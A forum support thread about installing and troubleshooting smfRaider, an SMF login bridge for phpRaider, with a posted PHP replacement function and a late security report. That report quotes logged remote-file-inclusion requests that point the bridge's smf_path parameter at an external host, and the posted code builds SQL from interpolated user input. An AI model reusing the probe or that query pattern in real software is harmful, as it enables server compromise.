Also I am not too sure if the right smf.function.php is packaged within 1.0b ?
Well, tried to set sub-domain independent cookies=true. Also makes no difference. What am I doing wrong?

Thanks & Cheers,
Darius

Just use the smf.function.php posted by Korpus above.

Did you set any smf_group? It has to be the SMF group id entered, not the group name.

I'll repackage when I get to my machine with the source code on :)

Can you try the new smf.functions.php I posted on page 10 and tell me if that works?

Plus as Van said are you entering IDs or group names into the 'allowed_groups' section?

Thanks

In the install is says leave blank to allow all for the allowed groups. This did not work for me. I added group 1 into the allowed groups in the DB and everything is working fine for me. I have not yet tried a non admin, but I assume i am going to have to add all of my other groups now to let the non-admins login?

Thanks for making this! Everything seems to be working fine. Peeps are put into the appropriate group by default. Everyone can login. It all works fine once I added groups. It might be nice to add group 1 by default and let them add additional ones during the install. Or even two, a default and a admin group during install and not even offer them to add any. That would be the most fool proof IMO.

The only issue I had once everything was running was the logout. I fixed that by just removing logout from phpRaider altogether.

The only issue I had once everything was running was the logout. I fixed that by just removing logout from phpRaider altogether.


That's pretty much what i did too. It's an extremely minor issue. Most people don't bother to log out anyway.

I'm glad it's working for you. Korpus did an awesome job! :)

Trying this out now.. let's see how it goes ;)

So, all goes well until step 8 (which is after you select SMF as your chosen authentication) This I assume is the step at which you enter the basic SMF variables.

Instead, it shows the phpraider header and just stops right afterwards, nothing more than that. Both phpraider and smf were performed by your steps perfectly, just not able to perform or get farther than step 8.

Any data you need I'll provide, just want to see what happens if I get this working. So, what do ya need?
points to his side, a midget pulls out a pen and paper, mumbling softly at how much work he's going to do.

NINJA UPDATE WAH!!: So I've been toying with it a bit, and found that after restoring original header, and using spiffy's code on page 10 as a test, it works fine now, For some reason, some changes in spiff's code is compatible with whatever is weird in my server setup compared to your download link on mainpage post 1. Will investigate more...

NINJA UPDATE WOH!!: Well, that was short lived success, now when I click on log in, it kicks me to the SMF forum (which I'm already logged in on) and when I log in, no dice.

I'll wait for further notes, work with the initial SMF raider. Seems like something does like my 8th step and I'll work on it from there.

Jack any chance you could set something up so I could directly look at your server? I would be interested to see why your setup is so different from mine/other peoples.

I would suggest reinstalling and using the 1.01 package that I just posted on page 1.

New version posted on page 1, should have fixed all the issues reported in the topic so far.

Before reporting an error though please check your config_auth values in the database. Normally the default values generated are always wrong and will cause serious issues for people.

So is the new version 1.01 working for everyone now?

No complaints here.

Jack any chance you could set something up so I could directly look at your server? I would be interested to see why your setup is so different from mine/other peoples.

I would suggest reinstalling and using the 1.01 package that I just posted on page 1.

New version posted on page 1, should have fixed all the issues reported in the topic so far.

Before reporting an error though please check your config_auth values in the database. Normally the default values generated are always wrong and will cause serious issues for people.


kk, I'll get you some information on that, but I'm going to try a few things first, I'm speaking to the owner of the server, checking some ideas. Thanks for confirming that post 1 works fine. Still trying to figure out what it was.

Good news, your new posted SMF version works seemlessly. Now it just not letting me log in persay. I click login, it goes to SMF and I log in, afterwards, it directs me to my forum. I then redirect to the raid page, and I'm not logged in.

Working on it now, by the way, the config Auth variables have been changed and I even double confirmed them. They're correct.

I know this sounds silly Jack but I wanted to negate the obvious first.

Your PHPRaider install and your SMF Forums are on the same domain right?

Did you re-try my header.php?

Finally what happens if you add this to smf.functions.php:

global $context;
echo '<pre>';
echo $context['user'];
echo '</pre>';


If $context is empty then it is a configuration error of the domain/cookies as the context information isn't being passed. Sometimes this can be caused by a late call to SSI.php (which is why I placed my call into the header.php)

Okay for anyone *still* having issues where they are logged into SMF and not into PHPRaider (but both are on the same domain)

Go into your Admin panel of SMF. Then to Server Settings > Feature Configuration then make sure the two following settings are set:

Enable local storage of cookies - Unticked
Use subdomain independent cookies - Ticked

Then if you had to change either/both of these settings get all your users to delete any cookies related to your forum/logout and back in again.

Then you will see that PHPRaider starts to receive the correct user information and logs people in.

So far its working for me.

Except for that issue about not using tributes. I couldn't use them either, so dumped em for the time being so we could still play with it. :P

Look around the forums. There's a thread showing how to make character names clickable to open up the their Armory profile. That is better than any attributes features because it's always accurate and kept up to date.

Look around the forums. There's a thread showing how to make character names clickable to open up the their Armory profile. That is better than any attributes features because it's always accurate and kept up to date.


Yeah I feel with Armory now and the way you can easily pull data from it manually keeping attributes updated in apps such as PHPRaider could be a thing of the past.

Remember, their are other games besides WoW. :P

LOTR doesn't have something similar to the armory where you can build a url from the server and player name? I know that Vanguard and EQ2 have the same thing too. Not sure about LOTR.

LOTR doesn't have something similar to the armory where you can build a url from the server and player name? I know that Vanguard and EQ2 have the same thing too. Not sure about LOTR.


Yeah I thought WoW's armory was an old idea? For the attribute problem you either have to ask Spiffy to recode and not use associative arrays (unlikely) or tell the makers of SMF to revise their security checks (very unlikely)

I've posted a fix to the issue on my OP and in the readme that came with smfRaider for those who 'really' need attributes :)

is there any way to change the options for smfRaider after the install?? the reason why i ask is that every time I go to log into raider it bumps me in to my forums login and wont let me login to raider. I think there is a setting i did wrong any help here?

Go into your MySQL admin panel and look at the configuration_auth table.

ah ok i did not know where it was hiding with the new setup thanks.

Warning: require_once(/www/s/t/o/stormrage.eu/public_html/aof/phpraider/SSI.php) [function.require-once]: failed to open stream: No such file or directory in /www/s/t/o/stormrage.eu/public_html/aof/phpraider/authentication/smf/smf.functions.php on line 113

Fatal error: require_once() [function.require]: Failed opening required '/www/s/t/o/stormrage.eu/public_html/aof/phpraider/SSI.php' (include_path='.:/usr/local/share/pear:/www/scripts/webshop:/www/scripts/public') in /www/s/t/o/stormrage.eu/public_html/aof/phpraider/authentication/smf/smf.functions.php on line 113

These are the errors I get after installing latest phpraider and smfraider. phpraider is a subdir of SMF/TP.
I had an earlier installation (an RC) which I deleted befor installing the newest phpraider. That worked fine, but when I reinstalled again, now with smfraider, it halted after going through the installation properly. I checked phpraider_config_auth and it has the paths listed correctly. I have set cookies in SMF like advised.

The error saying it cannot find your SSI.php so the path to it is wrong. Double check the paths as they may be incorrectly setup from the installation.

I double checked the path, it is ok. The same path is used for the (succesfull) initial installation isn't it?

- Can't find SSI.php in ../phpraider though. Should it be in there, or is it just a call?

edit: found a double / in phpraider_config_auth. But correcting that doesn't change anything.

no SSI.php should be in the root folder of your SMF install.

So if you have this structure:

/www/s/t/o/stormrage.eu/public_html/aof/smf/phpraider

Then you'll need it to be: /www/s/t/o/stormrage.eu/public_html/aof/smf

_________________________________________________
On a completely different note I've just upgraded SMFRaider to update people's email address on login, I'll post a new version this weekend.

That's what I figured.
Well all I can think of is a complete new install, remove all phpraider_ entries from the database. I'll wait for you new version then.

tnx.

That's what I figured.
Well all I can think of is a complete new install, remove all phpraider_ entries from the database. I'll wait for you new version then.
tnx.


Well did you change it then? Because from the error message you posted its pointing at: /www/s/t/o/stormrage.eu/public_html/aof/phpraider/ which I am guessing is your phpraider install and not your SMF install.

ah ok was sleeping :P, changed that path to the SMF install .../aof. Then I could log in, in the config screen the databasesettings don't stay there, nor the site settings or the miscellaneous settings. But phpraider seemed to work.

Then on logging out I get:

Parse error: syntax error, unexpected '[' in /www/s/t/o/stormrage.eu/public_html/aof/phpraider/logout.php on line 70

and on creating a char:

Invalid request variable.

edit: but the good news is that it actually auto-subscribed when I logged on with another smf-user :)

triple dot? try ../ or even better use /www/s/t/o/stormrage.eu/public_html/aof (which is what you should use)

for the invalid request variable read my OP I tell you how that can be worked around.

That path is what I used, I'm just lazy copying it again here. ;D

Removing the attributes indeed worked. Thanks.

Remains the logging out, that won't be a problem as I intend to call phpraider in an Iframe within TP. Perhaps I will even remove the logout, if possible.

The settings not beeing saved is a problem because it now won't let me set default join group. I'll do a search on that later.

edit: save for myself: http://www.phpraider.com/index.php?topic=1540.0

ugh... php makes my head hurt. I really need to learn this stuff.

Korpus you posted some replies earlier to another member regarding SMF membergroups "moving over" to phpraider or were they just mapping to a group in phpraider labeled the same?

What I would like to do ultimately is when the user first logs in to phpraider, their membergroup is assigned as well rather than a default group. Is this possible with some of the code you posted previously and if so, which code?

Thanks.

What I would like to do ultimately is when the user first logs in to phpraider, their membergroup is assigned as well rather than a default group. Is this possible with some of the code you posted previously and if so, which code?


Okay I haven't tested this code so I'll provide it in a 'hypothetical' sense but it should work :)

In smf.functions.php find the pVerify function and totally replace it with the code I've posted below. This will take the 'first' (primary) membergroup the person is a member of and copy that to the database as their group number. Meaning you may have to tweak ID values in the database of phpRaider to match that of your SMF install.

function pVerify($userdata) {
global $db_raid, $pConfig, $context, $user_info;

// ensure correct table is selected
// sometimes switches with other authentication methods
mysql_select_db($pConfig['db_name']);

$sql["SELECT"] = "*";
$sql["FROM"] = "profile";
$sql["WHERE"] = "user_email like '%{$userdata['user_email']}%'";

$db_raid->set_select($sql);

// if nothing returns we need to create profile
// otherwise they have a profile so let's set their ID
// we'll just use the phpBB user id as the profile ID to simplify things
if(($db_raid->sql_numrows($result) == 0) && $userdata['username'] != 'Anonymous') {

// nothing returned, create profile
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>$user_info['groups'][0],
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = $user_info['groups'][0];
}
} else {
// profile exists set group
$data = $db_raid->sql_fetchrow($result);
$_SESSION['group_id'] = $data['group_id'];
}
}


The really important lines are 'group_id'=>$user_info['groups'][0], and further down $_SESSION['group_id'] = $user_info['groups'][0]; If you want it to index a later value then change the '0' to a higher number (so for the 2nd group in their list change it to 1 instead of 0)

Finally this will not change their details if they change group in SMF later, this will only assign them to a group the first time they log/visit the phpRaider page. After that any changes you need to make must be done in the phpRaider admin section.

Thanks... that did the trick. I did have to go and modify the group id's to match SMF and there was an extra { in front of the else that I had to delete, but aside from those edits, it worked very well.

Thanks very much.

sorry if this is posted some where i have yet to have the time to look for it. When I go to my phpraider i have no issue because I'm a admin on both the forums and phpraider. Officers also don't have any issues with accessing phpraider however Members have a issue when going to phpraider they get this message

Error executing SQL statement

Details: SELECT profile_id FROM phpraider_raid WHERE raid_id=

Error: Access denied for user 'boguild3_smf1'@'localhost' to database 'boguild3_raider'

when i edit the Sql DB at accept the members group every one but me is unable to access phpraider. i know my member ID numbers it is just how do i Edit the SQL DB to accept Officers (10), Members(9) and Advisors (12)?

This is not an SMF Auth Bug, please do a search on the forums this is an issue with PHPRaider itself.

Is anyone else experiencing issues with adding the phpRaider block code snippet and smfRaider?

If anyone clicks on Event Calendar it takes them to it fine and authenticates the user without issues. However, if they click on one of the links that would take them to view the details of an event, it just sits there and asks to login over and over.

Anyone with any issues since upgrading to the latest version of phpRaider?

Fatal error: Call to undefined method sql_db::set_select() in /www/s/t/o/stormrage.eu/public_html/aof/phpraider/authentication/smf/smf.functions.php on line 20

never been able to get this working btw

Does this work better than the current auth in v1.05? I'm curious because I haven't had a problem yet and I have the JS SMF bridge phpraider smf bridge gallery joomla bridge and CB on top and haven't run into an issue with all these potential disasters. Maybe I am mistaken and Spiffy used your auth method in the 1.05 version?

The one included in the package is seperate from the one posted here.

Aha!! Why didn't anyone tell me it comes with a build in SMF auth! ;D Great work, works fine uptill now!
/bow

ok tryed to read true this post but H*'' there is a lot of stuff to understand.
so here goes.:

tried to create a fresh install both SMF 1.1.3 and phpRaider: v1.0.2
it works well almost.. on one sub it does not.

when i try to log out (as a rad there is no solution for this?)
i get a error:
Parse error: syntax error, unexpected '[' in /host/V/a/l/ValhallaRaid/pande/smf/phpraider/logout.php on line 70

And is there any way of getting a sync between the phpraider calendar and the SMF calender?

That's a good question I wonder if you can populate the smf calendar with phpraider info via rss.

As Spiffy is including SMF auth with the base PHPRaider install I will no longer be producing updates for this package as it seems its no longer required.

I would like to say thank you for all your great work over the time that you did support your project though. It was a valuable add-on and a value to the community.

all,

can anybody tell in which file or where in the DB the group id is stored? I'd like to add an additional group without reinstalling. thanks!

btw: anybody tested with 1.06 or 1.07 already?

Umm there are supposed to be 199 replies to this topic but I can only see the first page...
Edit: Nevermind, found the other replies (can only get to them from the main board view though, not from inside the topic).
Also, the file attachment appears to be missing.

Okay I haven't tested this code so I'll provide it in a 'hypothetical' sense but it should work :)

In smf.functions.php find the pVerify function and totally replace it with the code I've posted below. This will take the 'first' (primary) membergroup the person is a member of and copy that to the database as their group number. Meaning you may have to tweak ID values in the database of phpRaider to match that of your SMF install.

function pVerify($userdata) {
global $db_raid, $pConfig, $context, $user_info;

// ensure correct table is selected
// sometimes switches with other authentication methods
mysql_select_db($pConfig['db_name']);

$sql["SELECT"] = "*";
$sql["FROM"] = "profile";
$sql["WHERE"] = "user_email like '%{$userdata['user_email']}%'";

$db_raid->set_select($sql);

// if nothing returns we need to create profile
// otherwise they have a profile so let's set their ID
// we'll just use the phpBB user id as the profile ID to simplify things
if(($db_raid->sql_numrows($result) == 0) && $userdata['username'] != 'Anonymous') {

// nothing returned, create profile
$sql["INSERT"] = "profile";
$sql["VALUES"] = array(
'profile_id'=>$userdata['user_id'],
'user_email'=>$userdata['user_email'],
'password'=>'',
'group_id'=>$user_info['groups'][0],
'username'=>$userdata['username'],
'join_date'=>time());
$db_raid->set_insert($sql);

$_SESSION['group_id'] = $user_info['groups'][0];
}
} else {
// profile exists set group
$data = $db_raid->sql_fetchrow($result);
$_SESSION['group_id'] = $data['group_id'];
}
}


The really important lines are 'group_id'=>$user_info['groups'][0], and further down $_SESSION['group_id'] = $user_info['groups'][0]; If you want it to index a later value then change the '0' to a higher number (so for the 2nd group in their list change it to 1 instead of 0)

Finally this will not change their details if they change group in SMF later, this will only assign them to a group the first time they log/visit the phpRaider page. After that any changes you need to make must be done in the phpRaider admin section.

Korpus,

I was hoping you could assist again. Looking at the code, it appears some things have changed and I am assuming that the original code modification you had given me is no longer valid. Can you assist? Thanks.

If anyone is interested, I have corrected the code to work with 1.0.7. Send me a PM for the update.

Any progess ?

i see this post is quit bit old so i was wondering if a 1.1.4 smf version is out :)

nice job in all case

If anyone is interested, I have corrected the code to work with 1.0.7. Send me a PM for the update.

Its better if you release code like this than asking people to PM you (just attach it to the forums here).

As for this module? Why are people still using this, I thought the built in version worked better?

As for this module? Why are people still using this, I thought the built in version worked better?

I guess they use this one, since the built-in doesn't "bridge" the groups.

Yea I would to for the groups probably.

I'm trying to get PHPRaider to use my SMF logins using this module. I have the newest version of SMF (not sure if that is the problem?) but...
When I browse to my PHPRaider after going through the install process it gives me these errors:

Warning: require_once(/forum/SSI.php) [function.require-once]: failed to open stream: No such file or directory in /home/content/d/t/c/dtcornett/html/ACC/raider/authentication/smf/smf.functions.php on line 113

Fatal error: require_once() [function.require]: Failed opening required '/forum/SSI.php' (include_path='.:/usr/local/php5/lib/php') in /home/content/d/t/c/dtcornett/html/ACC/raider/authentication/smf/smf.functions.php on line 113

I noticed that the crazy long garbage path in there is the same thing that was initially in the "SMF Path" option during the install. Of course, I changed this to the correct path of my SMF during the install process, but it still seems to be looking there for some reason.
Anyone know where these settings are stored? I looked through my sql DB and found an entry with the correct path to SMF and couldn't find that bad path saved anywhere.
Any thoughts?

Also, I saw mention of a "built-in" way to use the smf logins in some of the replies here. Is this an option I should consider? What do I need to do to get that set up?

You choose your auth type at install smf joomla etc. You can find this information in the tables of the DB not sure if changing that information will make work correctly but it's easy to wipe it and start over if need be.

When I browse to my PHPRaider after going through the install process it gives me these errors:

Warning: require_once(/forum/SSI.php) [function.require-once]: failed to open stream: No such file or directory in /home/content/d/t/c/dtcornett/html/ACC/raider/authentication/smf/smf.functions.php on line 113

Fatal error: require_once() [function.require]: Failed opening required '/forum/SSI.php' (include_path='.:/usr/local/php5/lib/php') in /home/content/d/t/c/dtcornett/html/ACC/raider/authentication/smf/smf.functions.php on line 113

I noticed that the crazy long garbage path in there is the same thing that was initially in the "SMF Path" option during the install. Of course, I changed this to the correct path of my SMF during the install process, but it still seems to be looking there for some reason.


That long path may not be correct, but what you entered isn't correct either.
The value you want is probably closer to the "crazy long garbage path" than what you entered "/forum/"
Looking at your values, you should probably have entered:
"/home/content/d/t/c/dtcornett/html/ACC/forum/"

As what the module is looking for is the actual physical path where you installed SMF on your server, not the relative URL as you entered.

My guess is made from that access the forum with the url: "yourdomain.com/forums/" and that your phpRaider installation is accessed from "yourdomain.com/raider/" and that you're not using virtual directories on your webserver for your forum or phpRaider.


Anyone know where these settings are stored? I looked through my sql DB and found an entry with the correct path to SMF and couldn't find that bad path saved anywhere.
Any thoughts?

All settings related to the auth modules are stored in the phpraider_config_auth table in the database.

Also, I saw mention of a "built-in" way to use the smf logins in some of the replies here. Is this an option I should consider? What do I need to do to get that set up?

I'm guessing you used the built-in, since you probably didn't download this module from the forum?

Hello. Im have been trying to get PHPraider to work the for last week. I have had numerous problems but over time, have managed to solve them by either reading on this forum or just trial and error.

I am not stumped. The last problem I had was the common login issue. Where after logging in, you would be sent to the home page instead of redirected to PHPraider. I enabled the independent cookies like suggested and then I closed my browser and deleted my cookies.

When everything looked like it was going to work, and I was excited to finally have this in working order, boom, another error message. Unfortunately, I have no clue on how to fix this, and your search function wont let me search words that are less than 4 characters. (SMF, SQL_DB)

Well the new error is as follows:

Fatal error: Call to undefined method sql_db::set_select() in /home/eclectic/public_html/phpraider/authentication/smf/smf.functions.php on line 20

Now, after looking at the code in this specific file, around this specific line, this is what I see.

// ensure correct table is selected
// sometimes switches with other authentication methods
mysql_select_db($pConfig['db_name']);

$sql["SELECT"] = "*";
$sql["FROM"] = "profile";
$sql["WHERE"] = "user_email like '%{$userdata['user_email']}%'";

$db_raid->set_select($sql);

I guess there are a few details I should mention.

1) I am using the custom files downloaded from this site for the SMF Authentication.

2) My SMF Version is 1.1.2

3) PHPRaider Version 1.0.7b

Ok, so a little update.

As Im sure its no ones surprise, the custom file downloaded here was causing the problem. After replacing it with the stock (original) everything works beautiful!

Hello, I joined here to inform you that your phpRaider/SMF bridge may have some security vulnerabilities. I believe that there are people who know this bridge well enough, that are making scripts that can see the info used in people's bridged sites.

These people are using your bridge, to phish for login information, to people's SMF sites, and phpRaider.

I do not deal with phpRaider, yet I have 2 errors on my SMF site, looking for files I don't have, that are part of the SMF bridge:

Error 404 - Not Found (http://www.mysite.com/authentication/smf/smf.functions.php?pConfig_auth)

Error 404 - Not Found (http://www.mysite.com//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.geocities.com/dianavirsana/test.txt???)

Therefore, I suggest you take a look at the security of your bridge, before people start having their game accounts hacked.

Well, that issue is two sided kind of.
If your host secured the php installation the way the php manual suggests, then it's not possible to do what you write.
The php setting is: register_globals and the value that the php authors recomend that you set it to is "off".

With that set to off, none of the above issues is possible.

Also, you should have checked that you were running the latest version before complaining. Version 1.0.7b (http://forums.phpraider.com/showthread.php?t=1087#v1_0_7b_-_May_29__2008) was released may 29th 2008 (that's like 6 months ago) and in that release, it's not possible to use your exploit at all on any of the auth bridges.

1. My host does have it off.
2. I said that they tried, yet on my site, they failed, and got my 404 not found error.
3. I don't run phpRaider. In fact, never heard of it, until I researched the errors.

I was just alerting you all to what was being attempted. So you may find ways to protect the data of the users that do use the bridge.

Thank you for repporting, but as I wrote, we were aware of the problem. It was fixed in the 1.0.7b release from May 29th. :)